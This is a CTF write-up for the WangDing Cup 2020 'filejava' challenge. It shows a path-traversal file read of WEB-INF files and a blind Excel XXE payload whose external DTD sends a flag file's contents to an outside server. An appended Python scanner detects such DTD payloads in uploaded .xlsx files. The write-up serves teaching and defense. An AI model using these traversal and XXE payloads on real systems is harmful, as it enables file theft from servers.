[WangDing Cup (网鼎杯) 2020, Qinglong Division] filejava writeup

  1. File read
  2. Excel XXE
  3. Reference

File read

The application exposes a file download endpoint.

Testing it shows that arbitrary files can be read through the filename parameter.

For orientation, the typical tree of such a web directory looks like this:

E:\CODE\JAVA\JAVAWEB\FIRSTWEB\WEB
│  checkbox.jsp
│  hello.jsp
│  index.jsp
│  message.jsp
│  upload.jsp
│
└─WEB-INF
    │  web.xml
    │
    ├─classes
    │      CheckBox.class
    │      DatabaseAccess.class
    │      ErrorHandler.class
    │      HelloForm.class
    │      HelloWorld.class
    │      LogFilter.class
    │      UploadServlet.class
    │
    └─lib
            commons-fileupload-1.3.2.jar
            commons-io-2.5.jar

web.xml: ../../../../WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
</web-app>

Next, read a few class files through the same endpoint and decompile them (drop them into IDEA) to audit the code:
?filename=../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
?filename=../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
?filename=../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class

Excel XXE

In UploadServlet.java, the following code parses uploaded Excel files, so a blind Excel XXE is worth trying:
// ...
if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        // Only files named excel-*.xlsx reach the POI parser
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}
// ...

Run unzip .\Excel-1.xlsx to unpack a normal Excel file, add the DTD part to [Content_Types].xml as shown below, then repack the archive:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://vps:2122/1.dtd">
%remote;
%all;
]>
<root>&send;</root>

1.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://vps:2122/%file;'>">

The DTD file is only loaded, not parsed, so the payload must use the format above.

Start a web server with Python and watch for the incoming request.
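As an added example (not part of the original writeup or the challenge code), the scanner below shows the defensive counterpart: before handing an uploaded workbook to POI, inspect the XML parts inside the .xlsx container for the DTD constructs this payload depends on. OOXML parts never legitimately carry a DOCTYPE, so any hit is a reason to reject the upload. The sample workbooks and the host name attacker.invalid are constructed here.

```python
import io
import re
import zipfile

# DTD constructs that an OOXML part never needs but an XXE payload always has.
DTD_PATTERNS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.IGNORECASE),
    "entity": re.compile(rb"<!ENTITY", re.IGNORECASE),
    "system_id": re.compile(rb"SYSTEM\s+['\"](file:|https?:|ftp:)", re.IGNORECASE),
}


def scan_ooxml(data: bytes) -> dict:
    """Return {part_name: [matched pattern names]} for every XML/rels part of an
    OOXML container (xlsx/docx/pptx) that carries DTD constructs.
    A workbook produced by Excel yields an empty dict."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith((".xml", ".rels")):
                continue
            part = zf.read(info)
            hits = [name for name, pat in DTD_PATTERNS.items() if pat.search(part)]
            if hits:
                findings[info.filename] = hits
    return findings


def build_sample(content_types: bytes) -> bytes:
    """Constructed minimal xlsx-like zip, used only to exercise the scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", b'<?xml version="1.0"?><workbook/>')
    return buf.getvalue()


# Constructed [Content_Types].xml bodies: a benign one and one shaped like the
# writeup's payload (placeholder file path and host).
CLEAN = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
         b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
MALICIOUS = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             b'<!DOCTYPE ANY[<!ENTITY % file SYSTEM "file:///example">'
             b'<!ENTITY % remote SYSTEM "http://attacker.invalid/1.dtd">%remote;%all;]>'
             b'<root>&send;</root>')

if __name__ == "__main__":
    for label, ct in (("clean", CLEAN), ("dtd", MALICIOUS)):
        print(label, scan_ooxml(build_sample(ct)))
```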

Reference

https://xz.aliyun.com/t/7747

https://xz.aliyun.com/t/3741